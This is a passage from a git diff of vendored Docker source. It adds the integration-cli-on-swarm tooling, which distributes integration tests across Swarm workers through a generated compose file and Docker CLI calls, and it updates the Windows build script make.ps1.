+	"github.com/docker/docker/hack/integration-cli-on-swarm/agent/types"
+)
+
+func main() {
+	if err := xmain(); err != nil {
+		log.Fatalf("fatal error: %v", err)
+	}
+}
+
+func validImageDigest(s string) bool {
+	return reference.DigestRegexp.FindString(s) != ""
+}
+
+func xmain() error {
+	workerImageDigest := flag.String("worker-image-digest", "", "Needs to be the digest of this worker image itself")
+	dryRun := flag.Bool("dry-run", false, "Dry run")
+	keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm")
+	flag.Parse()
+	if !validImageDigest(*workerImageDigest) {
+		// Because of issue #29582.
+		// `docker service create localregistry.example.com/blahblah:latest` pulls the image data to local, but not a tag.
+		// So, `docker run localregistry.example.com/blahblah:latest` fails: `Unable to find image 'localregistry.example.com/blahblah:latest' locally`
+		return fmt.Errorf("worker-image-digest must be a digest, got %q", *workerImageDigest)
+	}
+	executor := privilegedTestChunkExecutor(!*keepExecutor)
+	if *dryRun {
+		executor = dryTestChunkExecutor()
+	}
+	return handle(*workerImageDigest, executor)
+}
+
+func handle(workerImageDigest string, executor testChunkExecutor) error {
+	log.Printf("Waiting for a funker request")
+	return funker.Handle(func(args *types.Args) types.Result {
+		log.Printf("Executing chunk %d, contains %d test filters",
+			args.ChunkID, len(args.Tests))
+		begin := time.Now()
+		code, rawLog, err := executor(workerImageDigest, args.Tests)
+		if err != nil {
+			log.Printf("Error while executing chunk %d: %v", args.ChunkID, err)
+			if code == 0 {
+				// Make sure this is a failure
+				code = 1
+			}
+			return types.Result{
+				ChunkID: args.ChunkID,
+				Code:    int(code),
+				RawLog:  rawLog,
+			}
+		}
+		elapsed := time.Since(begin)
+		log.Printf("Finished chunk %d, code=%d, elapsed=%v", args.ChunkID, code, elapsed)
+		return types.Result{
+			ChunkID: args.ChunkID,
+			Code:    int(code),
+			RawLog:  rawLog,
+		}
+	})
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go
new file mode 100644
index 0000000000..a92282a1a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go
@@ -0,0 +1,122 @@
+package main
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"text/template"
+
+	"github.com/docker/docker/client"
+)
+
+const composeTemplate = `# generated by integration-cli-on-swarm
+version: "3"
+
+services:
+  worker:
+    image: "{{.WorkerImage}}"
+    command: ["-worker-image-digest={{.WorkerImageDigest}}", "-dry-run={{.DryRun}}", "-keep-executor={{.KeepExecutor}}"]
+    networks:
+      - net
+    volumes:
+# Bind-mount the API socket so that we can invoke "docker run --privileged" within the service containers
+      - /var/run/docker.sock:/var/run/docker.sock
+    environment:
+      - DOCKER_GRAPHDRIVER={{.EnvDockerGraphDriver}}
+      - DOCKER_EXPERIMENTAL={{.EnvDockerExperimental}}
+    deploy:
+      mode: replicated
+      replicas: {{.Replicas}}
+      restart_policy:
+# The restart condition needs to be any for funker function
+        condition: any
+
+  master:
+    image: "{{.MasterImage}}"
+    command: ["-worker-service=worker", "-input=/mnt/input", "-chunks={{.Chunks}}", "-shuffle={{.Shuffle}}", "-rand-seed={{.RandSeed}}"]
+    networks:
+      - net
+    volumes:
+      - {{.Volume}}:/mnt
+    deploy:
+      mode: replicated
+      replicas: 1
+      restart_policy:
+        condition: none
+      placement:
+# Make sure the master can access the volume
+        constraints: [node.id == {{.SelfNodeID}}]
+
+networks:
+  net:
+
+volumes:
+  {{.Volume}}:
+    external: true
+`
+
+type composeOptions struct {
+	Replicas     int
+	Chunks       int
+	MasterImage  string
+	WorkerImage  string
+	Volume       string
+	Shuffle      bool
+	RandSeed     int64
+	DryRun       bool
+	KeepExecutor bool
+}
+
+type composeTemplateOptions struct {
+	composeOptions
+	WorkerImageDigest     string
+	SelfNodeID            string
+	EnvDockerGraphDriver  string
+	EnvDockerExperimental string
+}
+
+// createCompose creates "dir/docker-compose.yml".
+// If dir is empty, TempDir() is used.
+func createCompose(dir string, cli *client.Client, opts composeOptions) (string, error) {
+	if dir == "" {
+		var err error
+		dir, err = ioutil.TempDir("", "integration-cli-on-swarm-")
+		if err != nil {
+			return "", err
+		}
+	}
+	resolved := composeTemplateOptions{}
+	resolved.composeOptions = opts
+	workerImageInspect, _, err := cli.ImageInspectWithRaw(context.Background(), defaultWorkerImageName)
+	if err != nil {
+		return "", err
+	}
+	if len(workerImageInspect.RepoDigests) > 0 {
+		resolved.WorkerImageDigest = workerImageInspect.RepoDigests[0]
+	} else {
+		// fall back for non-pushed image
+		resolved.WorkerImageDigest = workerImageInspect.ID
+	}
+	info, err := cli.Info(context.Background())
+	if err != nil {
+		return "", err
+	}
+	resolved.SelfNodeID = info.Swarm.NodeID
+	resolved.EnvDockerGraphDriver = os.Getenv("DOCKER_GRAPHDRIVER")
+	resolved.EnvDockerExperimental = os.Getenv("DOCKER_EXPERIMENTAL")
+	composeFilePath := filepath.Join(dir, "docker-compose.yml")
+	tmpl, err := template.New("").Parse(composeTemplate)
+	if err != nil {
+		return "", err
+	}
+	f, err := os.Create(composeFilePath)
+	if err != nil {
+		return "", err
+	}
+	defer f.Close()
+	if err = tmpl.Execute(f, resolved); err != nil {
+		return "", err
+	}
+	return composeFilePath, nil
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go
new file mode 100644
index 0000000000..c08b763a2b
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go
@@ -0,0 +1,64 @@
+package main
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/client"
+)
+
+func system(commands [][]string) error {
+	for _, c := range commands {
+		cmd := exec.Command(c[0], c[1:]...)
+		cmd.Stdout = os.Stdout
+		cmd.Stderr = os.Stderr
+		cmd.Env = os.Environ()
+		if err := cmd.Run(); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func pushImage(unusedCli *client.Client, remote, local string) error {
+	// FIXME: eliminate os/exec (but it is hard to pass auth without os/exec ...)
+	return system([][]string{
+		{"docker", "image", "tag", local, remote},
+		{"docker", "image", "push", remote},
+	})
+}
+
+func deployStack(unusedCli *client.Client, stackName, composeFilePath string) error {
+	// FIXME: eliminate os/exec (but stack is implemented in CLI ...)
+	return system([][]string{
+		{"docker", "stack", "deploy",
+			"--compose-file", composeFilePath,
+			"--with-registry-auth",
+			stackName},
+	})
+}
+
+func hasStack(unusedCli *client.Client, stackName string) bool {
+	// FIXME: eliminate os/exec (but stack is implemented in CLI ...)
+	out, err := exec.Command("docker", "stack", "ls").CombinedOutput()
+	if err != nil {
+		panic(fmt.Errorf("`docker stack ls` failed with: %s", string(out)))
+	}
+	// FIXME: not accurate
+	return strings.Contains(string(out), stackName)
+}
+
+func removeStack(unusedCli *client.Client, stackName string) error {
+	// FIXME: eliminate os/exec (but stack is implemented in CLI ...)
+	if err := system([][]string{
+		{"docker", "stack", "rm", stackName},
+	}); err != nil {
+		return err
+	}
+	// FIXME
+	time.Sleep(10 * time.Second)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go
new file mode 100644
index 0000000000..3354c23c07
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go
@@ -0,0 +1,55 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"path/filepath"
+	"regexp"
+)
+
+var testFuncRegexp *regexp.Regexp
+
+func init() {
+	testFuncRegexp = regexp.MustCompile(`(?m)^\s*func\s+\(\w*\s*\*(\w+Suite)\)\s+(Test\w+)`)
+}
+
+func enumerateTestsForBytes(b []byte) ([]string, error) {
+	var tests []string
+	submatches := testFuncRegexp.FindAllSubmatch(b, -1)
+	for _, submatch := range submatches {
+		if len(submatch) == 3 {
+			tests = append(tests, fmt.Sprintf("%s.%s$", submatch[1], submatch[2]))
+		}
+	}
+	return tests, nil
+}
+
+// enumerateTests enumerates valid `-check.f` strings for all the test functions.
+// Note that we use regexp rather than parsing Go files for performance reason.
+// (Try `TESTFLAGS=-check.list make test-integration` to see the slowness of parsing)
+// The files needs to be `gofmt`-ed
+//
+// The result will be as follows, but unsorted ('$' is appended because they are regexp for `-check.f`):
+//  "DockerAuthzSuite.TestAuthZPluginAPIDenyResponse$"
+//  "DockerAuthzSuite.TestAuthZPluginAllowEventStream$"
+//  ...
+//  "DockerTrustedSwarmSuite.TestTrustedServiceUpdate$"
+func enumerateTests(wd string) ([]string, error) {
+	testGoFiles, err := filepath.Glob(filepath.Join(wd, "integration-cli", "*_test.go"))
+	if err != nil {
+		return nil, err
+	}
+	var allTests []string
+	for _, testGoFile := range testGoFiles {
+		b, err := ioutil.ReadFile(testGoFile)
+		if err != nil {
+			return nil, err
+		}
+		tests, err := enumerateTestsForBytes(b)
+		if err != nil {
+			return nil, err
+		}
+		allTests = append(allTests, tests...)
+	}
+	return allTests, nil
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go
new file mode 100644
index 0000000000..d6049ae52e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go
@@ -0,0 +1,84 @@
+package main
+
+import (
+	"os"
+	"path/filepath"
+	"reflect"
+	"sort"
+	"strings"
+	"testing"
+)
+
+func getRepoTopDir(t *testing.T) string {
+	wd, err := os.Getwd()
+	if err != nil {
+		t.Fatal(err)
+	}
+	wd = filepath.Clean(wd)
+	suffix := "hack/integration-cli-on-swarm/host"
+	if !strings.HasSuffix(wd, suffix) {
+		t.Skipf("cwd seems strange (needs to have suffix %s): %v", suffix, wd)
+	}
+	return filepath.Clean(filepath.Join(wd, "../../.."))
+}
+
+func TestEnumerateTests(t *testing.T) {
+	if testing.Short() {
+		t.Skip("skipping in short mode")
+	}
+	tests, err := enumerateTests(getRepoTopDir(t))
+	if err != nil {
+		t.Fatal(err)
+	}
+	sort.Strings(tests)
+	t.Logf("enumerated %d test filter strings:", len(tests))
+	for _, s := range tests {
+		t.Logf("- %q", s)
+	}
+}
+
+func TestEnumerateTestsForBytes(t *testing.T) {
+	b := []byte(`package main
+import (
+	"github.com/go-check/check"
+)
+
+func (s *FooSuite) TestA(c *check.C) {
+}
+
+func (s *FooSuite) TestAAA(c *check.C) {
+}
+
+func (s *BarSuite) TestBar(c *check.C) {
+}
+
+func (x *FooSuite) TestC(c *check.C) {
+}
+
+func (*FooSuite) TestD(c *check.C) {
+}
+
+// should not be counted
+func (s *FooSuite) testE(c *check.C) {
+}
+
+// counted, although we don't support ungofmt file
+  func   (s *FooSuite)    TestF  (c   *check.C){}
+`)
+	expected := []string{
+		"FooSuite.TestA$",
+		"FooSuite.TestAAA$",
+		"BarSuite.TestBar$",
+		"FooSuite.TestC$",
+		"FooSuite.TestD$",
+		"FooSuite.TestF$",
+	}
+
+	actual, err := enumerateTestsForBytes(b)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(expected, actual) {
+		t.Fatalf("expected %q, got %q", expected, actual)
+	}
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go
new file mode 100644
index 0000000000..fdc2a83e7f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go
@@ -0,0 +1,198 @@
+package main
+
+import (
+	"context"
+	"flag"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	defaultStackName       = "integration-cli-on-swarm"
+	defaultVolumeName      = "integration-cli-on-swarm"
+	defaultMasterImageName = "integration-cli-master"
+	defaultWorkerImageName = "integration-cli-worker"
+)
+
+func main() {
+	rc, err := xmain()
+	if err != nil {
+		logrus.Fatalf("fatal error: %v", err)
+	}
+	os.Exit(rc)
+}
+
+func xmain() (int, error) {
+	// Should we use cobra maybe?
+	replicas := flag.Int("replicas", 1, "Number of worker service replica")
+	chunks := flag.Int("chunks", 0, "Number of test chunks executed in batch (0 == replicas)")
+	pushWorkerImage := flag.String("push-worker-image", "", "Push the worker image to the registry. Required for distributed execution. (empty == not to push)")
+	shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity")
+	// flags below are rarely used
+	randSeed := flag.Int64("rand-seed", int64(0), "Random seed used for shuffling (0 == current time)")
+	filtersFile := flag.String("filters-file", "", "Path to optional file composed of `-check.f` filter strings")
+	dryRun := flag.Bool("dry-run", false, "Dry run")
+	keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm")
+	flag.Parse()
+	if *chunks == 0 {
+		*chunks = *replicas
+	}
+	if *randSeed == int64(0) {
+		*randSeed = time.Now().UnixNano()
+	}
+	cli, err := client.NewEnvClient()
+	if err != nil {
+		return 1, err
+	}
+	if hasStack(cli, defaultStackName) {
+		logrus.Infof("Removing stack %s", defaultStackName)
+		removeStack(cli, defaultStackName)
+	}
+	if hasVolume(cli, defaultVolumeName) {
+		logrus.Infof("Removing volume %s", defaultVolumeName)
+		removeVolume(cli, defaultVolumeName)
+	}
+	if err = ensureImages(cli, []string{defaultWorkerImageName, defaultMasterImageName}); err != nil {
+		return 1, err
+	}
+	workerImageForStack := defaultWorkerImageName
+	if *pushWorkerImage != "" {
+		logrus.Infof("Pushing %s to %s", defaultWorkerImageName, *pushWorkerImage)
+		if err = pushImage(cli, *pushWorkerImage, defaultWorkerImageName); err != nil {
+			return 1, err
+		}
+		workerImageForStack = *pushWorkerImage
+	}
+	compose, err := createCompose("", cli, composeOptions{
+		Replicas:     *replicas,
+		Chunks:       *chunks,
+		MasterImage:  defaultMasterImageName,
+		WorkerImage:  workerImageForStack,
+		Volume:       defaultVolumeName,
+		Shuffle:      *shuffle,
+		RandSeed:     *randSeed,
+		DryRun:       *dryRun,
+		KeepExecutor: *keepExecutor,
+	})
+	if err != nil {
+		return 1, err
+	}
+	filters, err := filtersBytes(*filtersFile)
+	if err != nil {
+		return 1, err
+	}
+	logrus.Infof("Creating volume %s with input data", defaultVolumeName)
+	if err = createVolumeWithData(cli,
+		defaultVolumeName,
+		map[string][]byte{"/input": filters},
+		defaultMasterImageName); err != nil {
+		return 1, err
+	}
+	logrus.Infof("Deploying stack %s from %s", defaultStackName, compose)
+	defer func() {
+		logrus.Infof("NOTE: You may want to inspect or clean up following resources:")
+		logrus.Infof(" - Stack: %s", defaultStackName)
+		logrus.Infof(" - Volume: %s", defaultVolumeName)
+		logrus.Infof(" - Compose file: %s", compose)
+		logrus.Infof(" - Master image: %s", defaultMasterImageName)
+		logrus.Infof(" - Worker image: %s", workerImageForStack)
+	}()
+	if err = deployStack(cli, defaultStackName, compose); err != nil {
+		return 1, err
+	}
+	logrus.Infof("The log will be displayed here after some duration."+
+		"You can watch the live status via `docker service logs %s_worker`",
+		defaultStackName)
+	masterContainerID, err := waitForMasterUp(cli, defaultStackName)
+	if err != nil {
+		return 1, err
+	}
+	rc, err := waitForContainerCompletion(cli, os.Stdout, os.Stderr, masterContainerID)
+	if err != nil {
+		return 1, err
+	}
+	logrus.Infof("Exit status: %d", rc)
+	return int(rc), nil
+}
+
+func ensureImages(cli *client.Client, images []string) error {
+	for _, image := range images {
+		_, _, err := cli.ImageInspectWithRaw(context.Background(), image)
+		if err != nil {
+			return fmt.Errorf("could not find image %s, please run `make build-integration-cli-on-swarm`: %v",
+				image, err)
+		}
+	}
+	return nil
+}
+
+func filtersBytes(optionalFiltersFile string) ([]byte, error) {
+	var b []byte
+	if optionalFiltersFile == "" {
+		tests, err := enumerateTests(".")
+		if err != nil {
+			return b, err
+		}
+		b = []byte(strings.Join(tests, "\n") + "\n")
+	} else {
+		var err error
+		b, err = ioutil.ReadFile(optionalFiltersFile)
+		if err != nil {
+			return b, err
+		}
+	}
+	return b, nil
+}
+
+func waitForMasterUp(cli *client.Client, stackName string) (string, error) {
+	// FIXME(AkihiroSuda): it should retry until master is up, rather than pre-sleeping
+	time.Sleep(10 * time.Second)
+
+	fil := filters.NewArgs()
+	fil.Add("label", "com.docker.stack.namespace="+stackName)
+	// FIXME(AkihiroSuda): we should not rely on internal service naming convention
+	fil.Add("label", "com.docker.swarm.service.name="+stackName+"_master")
+	masters, err := cli.ContainerList(context.Background(), types.ContainerListOptions{
+		All:     true,
+		Filters: fil,
+	})
+	if err != nil {
+		return "", err
+	}
+	if len(masters) == 0 {
+		return "", fmt.Errorf("master not running in stack %s?", stackName)
+	}
+	return masters[0].ID, nil
+}
+
+func waitForContainerCompletion(cli *client.Client, stdout, stderr io.Writer, containerID string) (int64, error) {
+	stream, err := cli.ContainerLogs(context.Background(),
+		containerID,
+		types.ContainerLogsOptions{
+			ShowStdout: true,
+			ShowStderr: true,
+			Follow:     true,
+		})
+	if err != nil {
+		return 1, err
+	}
+	stdcopy.StdCopy(stdout, stderr, stream)
+	stream.Close()
+	resultC, errC := cli.ContainerWait(context.Background(), containerID, "")
+	select {
+	case err := <-errC:
+		return 1, err
+	case result := <-resultC:
+		return result.StatusCode, nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go
new file mode 100644
index 0000000000..a6ddc6fae7
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go
@@ -0,0 +1,88 @@
+package main
+
+import (
+	"archive/tar"
+	"bytes"
+	"context"
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/client"
+)
+
+func createTar(data map[string][]byte) (io.Reader, error) {
+	var b bytes.Buffer
+	tw := tar.NewWriter(&b)
+	for path, datum := range data {
+		hdr := tar.Header{
+			Name: path,
+			Mode: 0644,
+			Size: int64(len(datum)),
+		}
+		if err := tw.WriteHeader(&hdr); err != nil {
+			return nil, err
+		}
+		_, err := tw.Write(datum)
+		if err != nil {
+			return nil, err
+		}
+	}
+	if err := tw.Close(); err != nil {
+		return nil, err
+	}
+	return &b, nil
+}
+
+// createVolumeWithData creates a volume with the given data (e.g. data["/foo"] = []byte("bar"))
+// Internally, a container is created from the image so as to provision the data to the volume,
+// which is attached to the container.
+func createVolumeWithData(cli *client.Client, volumeName string, data map[string][]byte, image string) error {
+	_, err := cli.VolumeCreate(context.Background(),
+		volume.VolumeCreateBody{
+			Driver: "local",
+			Name:   volumeName,
+		})
+	if err != nil {
+		return err
+	}
+	mnt := "/mnt"
+	miniContainer, err := cli.ContainerCreate(context.Background(),
+		&container.Config{
+			Image: image,
+		},
+		&container.HostConfig{
+			Mounts: []mount.Mount{
+				{
+					Type:   mount.TypeVolume,
+					Source: volumeName,
+					Target: mnt,
+				},
+			},
+		}, nil, "")
+	if err != nil {
+		return err
+	}
+	tr, err := createTar(data)
+	if err != nil {
+		return err
+	}
+	if cli.CopyToContainer(context.Background(),
+		miniContainer.ID, mnt, tr, types.CopyToContainerOptions{}); err != nil {
+		return err
+	}
+	return cli.ContainerRemove(context.Background(),
+		miniContainer.ID,
+		types.ContainerRemoveOptions{})
+}
+
+func hasVolume(cli *client.Client, volumeName string) bool {
+	_, err := cli.VolumeInspect(context.Background(), volumeName)
+	return err == nil
+}
+
+func removeVolume(cli *client.Client, volumeName string) error {
+	return cli.VolumeRemove(context.Background(), volumeName, true)
+}
diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1
index 14b9603b2e..70b9a47726 100644
--- a/vendor/github.com/docker/docker/hack/make.ps1
+++ b/vendor/github.com/docker/docker/hack/make.ps1
@@ -17,11 +17,12 @@
              development and Windows to Windows CI.
 
              Usage Examples (run from repo root):
-                "hack\make.ps1 -Binary" to build the binaries
-                "hack\make.ps1 -Client" to build just the client 64-bit binary
+                "hack\make.ps1 -Client" to build docker.exe client 64-bit binary (remote repo)
                 "hack\make.ps1 -TestUnit" to run unit tests
-                "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests
-                "hack\make.ps1 -All" to run everything this script knows about
+                "hack\make.ps1 -Daemon -TestUnit" to build the daemon and run unit tests
+                "hack\make.ps1 -All" to run everything this script knows about that can run in a container
+                "hack\make.ps1" to build the daemon binary (same as -Daemon)
+                "hack\make.ps1 -Binary" shortcut to -Client and -Daemon
 
 .PARAMETER Client
      Builds the client binaries.
@@ -30,7 +31,7 @@
      Builds the daemon binary.
 
 .PARAMETER Binary
-     Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`.
+     Builds the client and daemon binaries. A convenient shortcut to `make.ps1 -Client -Daemon`.
 
 .PARAMETER Race
      Use -race in go build and go test.
@@ -48,24 +49,23 @@
      Adds a custom string to be appended to the commit ID (spaces are stripped).
 
 .PARAMETER DCO
-     Runs the DCO (Developer Certificate Of Origin) test.
+     Runs the DCO (Developer Certificate Of Origin) test (must be run outside a container).
 
 .PARAMETER PkgImports
-     Runs the pkg\ directory imports test.
+     Runs the pkg\ directory imports test (must be run outside a container).
 
 .PARAMETER GoFormat
-     Runs the Go formatting test.
+     Runs the Go formatting test (must be run outside a container).
 
 .PARAMETER TestUnit
      Runs unit tests.
 
 .PARAMETER All
-     Runs everything this script knows about.
+     Runs everything this script knows about that can run in a container.
 
 
 TODO
 - Unify the head commit
-- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term)
 - Add golint and other checks (swagger maybe?)
 
 #>
@@ -88,6 +88,7 @@ param(
 )
 
 $ErrorActionPreference = "Stop"
+$ProgressPreference = "SilentlyContinue"
 $pushed=$False  # To restore the directory if we have temporarily pushed to one.
 
 # Utility function to get the commit ID of the repository
@@ -98,7 +99,7 @@ Function Get-GitCommit() {
         if ($env:DOCKER_GITCOMMIT.Length -eq 0) {
             Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified."
         }
-        Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable"
+        Write-Host "INFO: Git commit ($env:DOCKER_GITCOMMIT) assumed from DOCKER_GITCOMMIT environment variable"
         return $env:DOCKER_GITCOMMIT
     }
     $gitCommit=$(git rev-parse --short HEAD)
@@ -113,12 +114,6 @@ Function Get-GitCommit() {
     return $gitCommit
 }
 
-# Utility function to get get the current build version of docker
-Function Get-DockerVersion() {
-    if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" }
-    return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim()
-}
-
 # Utility function to determine if we are running in a container or not.
 # In Windows, we get this through an environment variable set in `Dockerfile.Windows`
 Function Check-InContainer() {
@@ -126,6 +121,25 @@ Function Check-InContainer() {
         Write-Host ""
         Write-Warning "Not running in a container. The result might be an incorrect build."
         Write-Host ""
+        return $False
+    }
+    return $True
+}
+
+# Utility function to warn if the version of go is correct. Used for local builds
+# outside of a container where it may be out of date with master.
+Function Verify-GoVersion() {
+    Try {
+        $goVersionDockerfile=(Get-Content ".\Dockerfile" | Select-String "ENV GO_VERSION").ToString().Split(" ")[2]
+        $goVersionInstalled=(go version).ToString().Split(" ")[2].SubString(2)
+    }
+    Catch [Exception] {
+        Throw "Failed to validate go version correctness: $_"
+    }
+    if (-not($goVersionInstalled -eq $goVersionDockerfile)) {
+        Write-Host ""
+        Write-Warning "Building with golang version $goVersionInstalled. You should update to $goVersionDockerfile"
+        Write-Host ""
     }
 }
 
@@ -156,7 +170,7 @@ Function Execute-Build($type, $additionalBuildTags, $directory) {
     if ($Race)                      { Write-Warning "Using race detector"; $raceParm=" -race"}
     if ($ForceBuildAll)             { $allParm=" -a" }
     if ($NoOpt)                     { $optParm=" -gcflags "+""""+"-N -l"+"""" }
-    if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) }
+    if ($additionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) }
 
     # Do the go build in the appropriate directory
     # Note -linkmode=internal is required to be able to debug on Windows.
@@ -184,7 +198,7 @@ Function Validate-DCO($headCommit, $upstreamCommit) {
     $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+'
 
     $dcoPrefix="Signed-off-by:"
-    $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$"
+    $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \(github: ($usernameRegex)\))?$"
 
     $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit"
     if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" }
@@ -237,10 +251,10 @@ Function Validate-PkgImports($headCommit, $upstreamCommit) {
         if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" }
         $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique
         # Filter out what we are looking for
-        $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" `
-                            -NotMatch "^github.com/docker/docker/vendor" `
-                            -Match "^github.com/docker/docker" `
-                            -Replace "`n", ""
+        $imports = @() + $imports -NotMatch "^github.com/docker/docker/pkg/" `
+                                  -NotMatch "^github.com/docker/docker/vendor" `
+                                  -Match "^github.com/docker/docker" `
+                                  -Replace "`n", ""
         $imports | % { $badFiles+="$file imports $_`n" }
     }
     if ($badFiles.Length -eq 0) {
@@ -261,7 +275,7 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) {
 
     # Get a list of all go source-code files which have changed.  Ignore exit code on next call - always process regardless
     $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'"
-    $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go"
+    $files = $files | Select-String -NotMatch "^vendor/"
     $badFiles=@(); $files | %{
         # Deliberately ignore error on next line - treat as failed
         $content=Invoke-Expression "git show $headCommit`:$_"
@@ -273,9 +287,10 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) {
         $outputFile=[System.IO.Path]::GetTempFileName()
         if (Test-Path $outputFile) { Remove-Item $outputFile }
         [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False)))
-        $valid=Invoke-Expression "gofmt -s -l $outputFile"
-        Write-Host "Checking $outputFile"
-        if ($valid.Length -ne 0) { $badFiles+=$_ }
+        $currentFile = $_ -Replace("/","\")
+        Write-Host Checking $currentFile
+        Invoke-Expression "gofmt -s -l $outputFile"
+        if ($LASTEXITCODE -ne 0) { $badFiles+=$currentFile }
         if (Test-Path $outputFile) { Remove-Item $outputFile }
     }
     if ($badFiles.Length -eq 0) {
@@ -298,7 +313,7 @@ Function Run-UnitTests() {
     $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker"
     $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor"
     $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man"
-    $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli"
+    $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration"
     $pkgList = $pkgList -replace "`r`n", " "
     $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList"
     Invoke-Expression $goTestCommand
@@ -308,16 +323,21 @@ Function Run-UnitTests() {
 # Start of main code.
 Try {
     Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)"
-    $root=$(pwd)
+
+    # Get to the root of the repo
+    $root = $(Split-Path $MyInvocation.MyCommand.Definition -Parent | Split-Path -Parent)
+    Push-Location $root
 
     # Handle the "-All" shortcut to turn on all things we can handle.
-    if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True }
+    # Note we expressly only include the items which can run in a container - the validations tests cannot
+    # as they require the .git directory which is excluded from the image by .dockerignore
+    if ($All) { $Client=$True; $Daemon=$True; $TestUnit=$True }
 
     # Handle the "-Binary" shortcut to build both client and daemon.
     if ($Binary) { $Client = $True; $Daemon = $True }
 
-    # Make sure we have something to do
-    if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' }
+    # Default to building the daemon if not asked for anything explicitly.
+    if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { $Daemon=$True }
 
     # Verify git is installed
     if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" }
@@ -329,12 +349,15 @@ Try {
     $gitCommit=Get-GitCommit
     if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' }
 
-    # Get the version of docker (eg 1.14.0-dev)
-    $dockerVersion=Get-DockerVersion
+    # Get the version of docker (eg 17.04.0-dev)
+    $dockerVersion="0.0.0-dev"
 
